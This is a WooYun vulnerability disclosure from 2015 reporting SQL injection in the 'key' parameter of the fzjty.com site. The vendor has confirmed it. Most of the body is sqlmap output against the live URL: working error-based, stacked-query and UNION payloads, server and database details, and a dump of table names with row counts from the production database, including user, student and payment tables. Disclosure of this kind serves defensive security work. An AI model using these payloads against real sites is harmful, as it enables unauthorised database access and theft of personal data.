当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154822

漏洞标题:方直科技主站存在SQL注入漏洞

相关厂商:fzjty.com

漏洞作者: 凉凉

提交时间:2015-11-23 14:11

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://www.fzjty.com/ProList.html?key=N

31.jpg

qlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: key=N%' AND 5624=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5624=5624) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113))) AND '%'='
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: key=N%';WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: key=N%' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(117)+CHAR(77)+CHAR(84)+CHAR(109)+CHAR(70)+CHAR(100)+CHAR(121)+CHAR(97)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: ksshop2
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.UserNumInfo | 2384686 |
| dbo.mobiler_code | 298310 |
| dbo.SerialNumber | 226323 |
| dbo.ViewProduct | 84232 |
| dbo.UserNumberRunTime | 61600 |
| dbo.Message | 25145 |
| dbo.CheckRecord | 12530 |
| dbo.TbKeyWordMonitor | 12241 |
| dbo.TbKeyWordMonitor | 12241 |
| dbo.tb_orderitem | 10399 |
| dbo.tb_orderitem | 10399 |
| dbo.tb_area | 3149 |
| dbo.vi_area_all | 3149 |
| dbo.User_Product | 2718 |
| dbo.View_AreaUserProduct | 2718 |
| dbo.CourseInfo | 1522 |
| dbo.tb_ChinaTeacherOrders | 1323 |
| dbo.Requestinfo_Product | 853 |
| dbo.Requestinfo_Product | 853 |
| dbo.tb_ExpProduct | 828 |
| dbo.[ShoolStatistics ] | 743 |
| dbo.tb_activeproduct | 610 |
| dbo.tb_FavProduct | 535 |
| dbo.tb_unitinfo | 487 |
| dbo.vi_unitinfo_all | 487 |
| dbo.vi_unitinfo_studentname | 487 |
| dbo.mobile_area | 460 |
| dbo.tb_product | 350 |
| dbo.teachinfo | 350 |
| dbo.View_GradeName | 350 |
| dbo.View_PackAge | 350 |
| dbo.View_ProductUnion | 350 |
| dbo.View_tb_product | 350 |
| dbo.View_Teachinfo | 350 |
| dbo.View_TypeName | 350 |
| dbo.tb_city | 348 |
| dbo.SpecialPriceProduct | 346 |
| dbo.SpecialPriceProduct | 346 |
| dbo.tb_subjectclass | 334 |
| dbo.tb_subjectclass | 334 |
| dbo.AreaStatistics | 306 |
| dbo.CategoryArea | 209 |
| dbo.TbShoppingCart | 185 |
| dbo.prodmodule | 170 |
| dbo.BatchInformation | 157 |
| dbo.tb_UserHelpQuestion | 114 |
| dbo.tb_student | 91 |
| dbo.vi_student_classes | 91 |
| dbo.tb_righttree | 84 |
| dbo.tb_unitclass | 81 |
| dbo.vi_unitclass_name | 81 |
| dbo.tb_idea | 74 |
| dbo.vi_teacher_unitclass | 66 |
| dbo.tb_unitname | 57 |
| dbo.tb_classes | 40 |
| dbo.TbMenu | 40 |
| dbo.vi_class_school | 40 |
| dbo.VersionFileName | 36 |
| dbo.tb_province | 34 |
| dbo.TbAdvertize | 31 |
| dbo.tb_category | 30 |
| dbo.tb_grade | 30 |
| dbo.vi_category_all | 30 |
| dbo.tb_company | 27 |
| dbo.tb_knowledge | 24 |
| dbo.tb_UserHelper | 24 |
| dbo.tb_UserHelper | 24 |
| dbo.tb_AdminHelper | 20 |
| dbo.Package | 19 |
| dbo.tb_HyperLink | 18 |
| dbo.Concern | 16 |
| dbo.tb_AdminHelpQuestion | 15 |
| dbo.tb_announcement | 14 |
| dbo.Gradearea | 13 |
| dbo.tb_job | 13 |
| dbo.Type | 13 |
| dbo.tb_serverlnow | 12 |
| dbo.tb_treeclass | 11 |
| dbo.tb_treeclass | 11 |
| dbo.tb_materialinfo | 10 |
| dbo.vi_teacher_classes | 10 |
| dbo.tb_contect | 9 |
| dbo.ActiveRange | 7 |
| dbo.dtproperties | 7 |
| dbo.tb_Region | 6 |
| dbo.TbLocation | 6 |
| dbo.Promotion | 5 |
| dbo.tb_manager | 5 |
| dbo.tb_rightmanager | 5 |
| dbo.tb_rightmanager | 5 |
| dbo.tb_school | 5 |
| dbo.tb_teachers | 5 |
| dbo.Exp_Orde | 4 |
| dbo.PresentType | 4 |
| dbo.tb_payment | 3 |
| dbo.VersionManage | 3 |
| dbo.tb_deliver | 2 |
| dbo.tb_knowcate | 2 |
| dbo.tb_WareHouse | 2 |
| dbo.ActiveInformation | 1 |
| dbo.comments | 1 |
| dbo.FreeFare | 1 |
| dbo.ImageInfo | 1 |
| dbo.tb_materialactive | 1 |
| dbo.tb_materialschool | 1 |
| dbo.TbProductAdvertize | 1 |
| dbo.TbVisit | 1 |
+-----------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 凉凉@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-11-27 09:07

厂商回复:

修复中,谢谢

最新状态:

暂无


漏洞评价:

评价